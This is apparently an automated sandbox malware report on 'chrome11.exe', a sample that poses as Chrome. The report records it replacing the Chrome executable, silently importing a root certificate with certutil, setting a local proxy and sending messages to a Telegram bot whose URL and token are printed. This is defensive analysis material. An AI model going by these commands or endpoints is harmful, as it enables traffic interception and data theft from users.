Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
chrome11.exe

Overview

General Information

Sample name:chrome11.exe
Analysis ID:1577377
MD5:5b39766f490f17925defaee5de2f9861
SHA1:9c89f2951c255117eb3eebcd61dbecf019a4c186
SHA256:de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
Tags:18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Enables a proxy for the internet explorer
Infects executable files (exe, dll, sys, html)
Installs new ROOT certificates
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sets a proxy for the internet explorer
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious PFX File Creation
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • chrome11.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\chrome11.exe" MD5: 5B39766F490F17925DEFAEE5DE2F9861)
    • certutil.exe (PID: 7920 cmdline: "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp" MD5: F17616EC0522FC5633151F7CAA278CAA)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\chrome11.exe, ProcessId: 7636, TargetFilename: C:\Users\user\AppData\Local\Temp\rootCert.pfx
Source: Registry Key setAuthor: frack113: Data: Details: localhost:8777, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\chrome11.exe, ProcessId: 7636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeReversingLabs: Detection: 31%
Source: C:\Program Files\Google\Chrome\Application\original.exe (copy)ReversingLabs: Detection: 31%
Source: chrome11.exeReversingLabs: Detection: 31%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Users\user\Desktop\chrome11.exeDirectory created: C:\Program Files\Google\Chrome\Application\chrome.exeJump to behavior
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: chrome11.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\HP\Desktop\SilentProxy\bin\Debug\chrome.pdb source: chrome11.exe, chrome.exe.0.dr

Spreading

barindex
Source: C:\Users\user\Desktop\chrome11.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome.exeJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeCode function: 4x nop then jmp 00007FF887C06050h0_2_00007FF887C05EDE
Source: C:\Users\user\Desktop\chrome11.exeCode function: 4x nop then mov edx, dword ptr [ebp-18h]0_2_00007FF887C0A1F3
Source: C:\Users\user\Desktop\chrome11.exeCode function: 4x nop then jmp 00007FF887C10469h0_2_00007FF887C10413
Source: C:\Users\user\Desktop\chrome11.exeCode function: 4x nop then dec eax0_2_00007FF887E00F97
Source: C:\Users\user\Desktop\chrome11.exeCode function: 4x nop then dec eax0_2_00007FF887E06E07

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: global trafficHTTP traffic detected: POST /bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage HTTP/1.1Content-Type: application/json; charset=utf-8Host: api.telegram.orgContent-Length: 95Expect: 100-continueConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage HTTP/1.1Content-Type: application/json; charset=utf-8Host: api.telegram.orgContent-Length: 95Expect: 100-continueConnection: Keep-Alive
Source: chrome11.exe, chrome.exe.0.drString found in binary or memory: http://.css
Source: chrome11.exe, chrome.exe.0.drString found in binary or memory: http://.jpg
Source: chrome11.exe, 00000000.00000002.1477410588.000001D2308E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
Source: chrome11.exe, chrome.exe.0.drString found in binary or memory: http://html4/loose.dtd
Source: chrome11.exe, 00000000.00000002.1477410588.000001D2308BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome11.exe, 00000000.00000002.1477410588.000001D2308BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
Source: chrome11.exe, chrome.exe.0.drString found in binary or memory: https://api.telegram.org/bot
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230837000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230837000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49707 version: TLS 1.2

E-Banking Fraud

barindex
Source: C:\Users\user\Desktop\chrome11.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServerJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeFile created: C:\Users\user\AppData\Local\Temp\rootCert.pfxJump to dropped file
Source: C:\Users\user\Desktop\chrome11.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC4B4.tmpJump to dropped file

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\chrome11.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnableJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServerJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887C04D320_2_00007FF887C04D32
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887C03F860_2_00007FF887C03F86
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887C114C80_2_00007FF887C114C8
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887C114C00_2_00007FF887C114C0
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887DF39800_2_00007FF887DF3980
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887DF91DD0_2_00007FF887DF91DD
Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\Application\chrome.exe DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\Application\original.exe (copy) DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
Source: chrome11.exe, 00000000.00000000.1395181711.000001D22E7A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs chrome11.exe
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs chrome11.exe
Source: chrome11.exe, 00000000.00000002.1477410588.000001D230922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs chrome11.exe
Source: chrome11.exeBinary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe
Source: classification engineClassification label: mal84.spre.bank.troj.adwa.evad.winEXE@4/14@1/1
Source: C:\Users\user\Desktop\chrome11.exeFile created: C:\Program Files\Google\Chrome\Application\chrome.exeJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Users\user\Desktop\chrome11.exeFile created: C:\Users\user\AppData\Local\Temp\unique_laptops.txtJump to behavior
Source: chrome11.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: chrome11.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
Source: C:\Users\user\Desktop\chrome11.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: chrome11.exeReversingLabs: Detection: 31%
Source: chrome11.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: C:\Users\user\Desktop\chrome11.exeFile read: C:\Users\user\Desktop\chrome11.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\chrome11.exe "C:\Users\user\Desktop\chrome11.exe"
Source: C:\Users\user\Desktop\chrome11.exeProcess created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp"
Source: C:\Windows\System32\certutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\chrome11.exeProcess created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp"Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: msisip.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: wshext.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: esdsip.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certenroll.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsparse.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: webservices.dllJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeDirectory created: C:\Program Files\Google\Chrome\Application\chrome.exeJump to behavior
Source: chrome11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: chrome11.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: chrome11.exeStatic file information: File size 4767744 > 1048576
Source: chrome11.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x47de00
Source: chrome11.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: chrome11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\HP\Desktop\SilentProxy\bin\Debug\chrome.pdb source: chrome11.exe, chrome.exe.0.dr
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887C0B648 push es; retn 7002h0_2_00007FF887C0C0CD
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887C0755A push ebx; iretd 0_2_00007FF887C0756A
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887C173AC push eax; retf 0_2_00007FF887C173AD
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887DFEFFF push ebp; iretd 0_2_00007FF887DFF000
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887E03EFA push es; iretd 0_2_00007FF887E03EFC
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887DF270C push E8FFFFFDh; retf 0_2_00007FF887DF2711
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887E0557C push esp; iretd 0_2_00007FF887E055D9
Source: C:\Users\user\Desktop\chrome11.exeCode function: 0_2_00007FF887DF52F5 push esp; iretd 0_2_00007FF887DF55D9

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\chrome11.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome.exeJump to behavior
Source: C:\Windows\System32\certutil.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0 BlobJump to behavior
Source: C:\Windows\System32\certutil.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0 BlobJump to behavior
Source: C:\Windows\System32\certutil.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0 BlobJump to behavior
Source: C:\Windows\System32\certutil.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0 BlobJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeFile created: C:\Program Files\Google\Chrome\Application\chrome.exeJump to dropped file
Source: C:\Users\user\Desktop\chrome11.exeFile created: C:\Program Files\Google\Chrome\Application\original.exe (copy)Jump to dropped file
Source: C:\Users\user\Desktop\chrome11.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\chrome11.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\chrome11.exeMemory allocated: 1D22EF50000 memory reserve | memory write watchJump to behavior
